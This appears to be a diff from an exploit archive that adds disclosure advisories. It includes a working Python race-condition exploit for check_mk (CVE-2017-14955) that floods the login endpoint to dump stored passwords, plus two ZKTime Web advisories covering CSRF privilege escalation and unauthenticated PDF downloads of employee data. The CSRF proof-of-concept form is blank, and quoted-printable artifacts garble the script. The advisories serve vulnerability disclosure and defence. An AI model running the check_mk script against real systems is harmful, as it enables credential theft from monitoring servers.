+# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
+# below as described by CVE-2017-14955. You only need a valid username to
+# dump all encrypted passwords and make sure to setup a local proxy to
+# catch the dump. Happy brute forcing ;-)
+
+import requests
+import threading
+
+try:
+=09from requests.packages.urllib3.exceptions import InsecureRequestWarning
+=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+except:
+=09pass
+
+# Config Me
+target_url =3D "https://localhost/check_mk/login.py"
+target_username =3D "omdadmin"
+
+proxies =3D {
+  'http': 'http://127.0.0.1:8080',
+  'https': 'http://127.0.0.1:8080',
+}
+
+def make_session():
+=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=
+=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=
+ne, 'index.py'), '_username': (None, target_username), '_password': (None, =
+'random'), '_login': (None, 'Login')})
+=09return v.content
+
+NUM =3D 50
+
+threads =3D []
+for i in range(NUM):
+    t =3D threading.Thread(target=3Dmake_session)
+    threads.append(t)
+    t.start()
+
+7. RISK
+=======
+To successfully exploit this vulnerability an unauthenticated attacker must only
+have network-level access to the application.
+
+The vulnerability allows remote attackers to trigger an exception, which
+discloses a variety of sensitive internal information such as:
+- Local server paths
+- Usernames
+- Passwords (hashed)
+- and user directory-specific attributes (i.e. LDAP)
+
+
+8. SOLUTION
+===========
+Update to 1.2.8p26.
+
+
+9. REPORT TIMELINE
+==================
+2017-09-21: Discovery of the vulnerability
+2017-09-21: Sent limited information to publicly listed email address
+2017-09-21: Vendor responds and asks for details
+2017-09-21: Full vulnerability details sent to vendor
+2017-09-25: Vendor pushes fix to git
+2017-10-01: MITRE assigns CVE-2017-14955
+2017-10-16: Fix confirmed
+2017-10-18: Public disclosure
+
+
+10. REFERENCES
+=============
+[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
+[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955
+
+
diff --git a/platforms/windows/remote/41160.py b/platforms/windows/dos/41160.py
similarity index 100%
rename from platforms/windows/remote/41160.py
rename to platforms/windows/dos/41160.py
diff --git a/platforms/windows/webapps/43018.html b/platforms/windows/webapps/43018.html
new file mode 100755
index 000000000..64d9ca30c
--- /dev/null
+++ b/platforms/windows/webapps/43018.html
@@ -0,0 +1,83 @@
+Exploit Title: ZKTime Web Software 2.0 - Cross Site Request Forgery
+CVE-ID: CVE-2017-13129
+Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
+Vendor of Product: ZKTeco
+Affected Product Code: ZKTime Web - 2.0.1.12280
+Category: WebApps
+Author: Arvind V.
+Author Social: @Find_Arvind
+
+------------------------------------------
+
+Product description:
+ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software, which
+provided a stable communication for devices through GPRS/WAN, hence, users
+can access the software anywhere by their Web Browser to remotely manage
+hundreds of T&A terminals under complex network condition (WLAN). The
+Application has an administrator role and application user role.
+
+Attack Description:
+The ZKTime Web Software allows the Administrator to elevate the privileges
+of the application user by simple click of a radio button namely
+"superuser". However when the request is generated there are no random
+tokens attached to this request to prevent any kind of Cross Site Request
+Forgery attacks. Moreover there no other protections (like administrator
+password verification etc.) mechanisms in place to block any kind of forged
+requests.
+An Attacker takes advantage of this scenario and creates a crafted link to
+add himself as an administrator to the ZKTime Web Software. He then uses
+social engineering methods to trick the administrator into click the forged
+http request. The request is executed and the attacker becomes the
+Administrator of the
+ZKTime Web Software.
+
+Proof of Concept Code:
+Forged HTTP Request used by the attacker:
+
+    
+    

+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+      
+    

+
+
+
+Impact:
+If the vulnerability is successfully exploited than an attacker (who would
+be a normal user of the web application) can escalate his privileges and
+become the administrator of ZK Time Web Software.
+
+References:
+http://seclists.org/fulldisclosure/2017/Sep/38
+http://seclists.org/bugtraq/2017/Sep/19
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13129
+
+Vulnerability Timeline:
+18th August 2017 – Vulnerability Discovered
+20th August 2017 – Contacted Vendor – No Response
+1st September 2017 – Contacted Vendor again – No Response
+18th September 2017 – Vulnerability Disclosed
diff --git a/platforms/windows/webapps/43019.txt b/platforms/windows/webapps/43019.txt
new file mode 100755
index 000000000..96757c633
--- /dev/null
+++ b/platforms/windows/webapps/43019.txt
@@ -0,0 +1,53 @@
+Exploit Title: ZKTime Web Software 2.0 - Broken Authentication
+CVE-ID: CVE-2017-14680
+Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
+Vendor of Product: ZKTeco
+Affected Product Code: ZKTime Web - 2.0.1.12280
+Category: WebApps
+Author: Arvind V.
+Author Social: @Find_Arvind
+
+------------------------------------------
+
+Product description:
+ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software, which
+provided a stable communication for devices through GPRS/WAN, hence, users
+can access the software anywhere by their Web Browser to remotely manage
+hundreds of T&A terminals under complex network condition (WLAN). The
+Application has an administrator role and application user role.
+
+Attack Description:
+The Application is a time attendance software which allows users to
+download their time and attendance data from the application in a PDF
+Format. The data includes their employee’s id, user-id, gender,
+birth-dates, phone numbers and access-areas. These PDF Files however are
+not properly authenticated. If any user get access to the file-download
+link, he can go ahead and download these files directly without any
+authentication.
+
+Proof of Concept Links:
+
+1) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144237.pdf
+
+2) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144238.pdf
+
+3) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144239.pdf
+
+
+
+Impact:
+Personal details pertaining to the employees of the company are disclosed
+without their permissions. This leads to violation of user privacy.
+Moreover the information available can be used to mount further attacks.
+
+References:
+http://seclists.org/fulldisclosure/2017/Sep/39
+http://seclists.org/bugtraq/2017/Sep/20
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14680
+
+
+Vulnerability Timeline:
+18th August 2017 – Vulnerability Discovered
+20th August 2017 – Contacted Vendor – No Response
+1st September 2017 – Contacted Vendor again – No Response
+18th September 2017 – Vulnerability Disclosed